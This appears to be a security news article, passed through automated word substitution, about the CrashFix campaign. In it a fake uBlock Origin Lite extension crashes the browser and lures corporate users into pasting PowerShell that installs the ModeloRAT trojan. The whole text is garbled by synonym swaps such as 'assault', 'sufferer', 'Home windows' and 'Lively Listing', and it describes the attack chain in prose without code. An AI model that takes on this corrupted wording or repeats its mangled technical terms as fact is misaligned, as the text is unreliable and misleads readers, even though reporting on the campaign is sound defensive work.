A recent variant of the ClickFix assault depends on a malicious Chrome extension to show a safety warning and lure victims into executing undesirable instructions to put in malware, Huntress stories.
Dubbed CrashFix, the assault begins with the NexShield browser extension, which impersonates the reliable uBlock Origin Lite advert blocker.
The extension shows a pretend safety warning instructing the sufferer to repair allegedly recognized points by opening the Home windows Run dialogue and pasting content material from the clipboard.
Simply as within the basic ClickFix assaults, NexShield silently copies malicious PowerShell instructions to the clipboard, masquerading as a restore command, designed to contaminate the sufferer’s system with ModeloRAT.
Nevertheless, solely hosts which are domain-joined are contaminated, which means that the risk actor behind the marketing campaign, dubbed KongTuke and energetic since at the very least early 2025, is focusing on company environments.
The core malicious performance of NexShield, Huntress explains, is a denial-of-service (DoS) assault towards the sufferer’s browser, setting the stage for the CrashFix social engineering approach.
The extension executes a operate that makes an attempt to iterate 1 billion instances, making a chrome.runtime port reference to every iteration. As soon as it completes the iterations, it begins once more, in an infinite loop.Commercial. Scroll to proceed studying.
This exhausts system sources and causes the browser to turn into unresponsive and crash. If the browser is restarted, the pretend safety warning triggering the CrashFix assault is displayed.
To keep away from elevating person suspicion, NexShield units a timer in order that the malicious conduct is triggered 60 minutes after set up. The DoS assault begins 10 minutes later and is executed each 10 minutes, however solely towards customers for whom the extension has despatched a person ID to the command-and-control (C&C) server.
A deal with enterprise environments
The malicious command that victims run in a CrashFix assault results in the execution of the reliable Home windows utility Finger.exe, which might retrieve details about customers on distant methods.
The command additionally retrieves a secondary payload that fetches and executes malicious code from a distant server, putting in the fully-featured Python-based ModeloRAT distant entry trojan on domain-joined methods.
The RAT performs system reconnaissance, establishes persistence, and helps command execution. It additionally options adaptive C&C beaconing, obfuscation, two-layered encryption, and anti-analysis capabilities.
In line with Huntress, the malware operator seems targeted on compromising company environments to realize entry to Lively Listing, inside sources, and delicate knowledge. Thus, ModeloRAT will not be served to dwelling customers (an an infection mechanism for hosts that aren’t domain-joined has not been carried out in CrashFix).
“KongTuke’s CrashFix marketing campaign demonstrates how risk actors proceed to evolve their social engineering ways. By impersonating a trusted open-source venture (uBlock Origin Lite), crashing the person’s browser on function, after which providing a pretend repair, they’ve constructed a self-sustaining an infection loop that preys on person frustration,” Huntress notes.
Associated: Refined ClickFix Marketing campaign Focusing on Hospitality Sector
Associated: ClickFix Assaults Towards macOS Customers Evolving
Associated: Chrome Extensions With 900,000 Downloads Caught Stealing AI Chats
Associated: Chrome, Edge Extensions Caught Monitoring Customers, Creating Backdoors
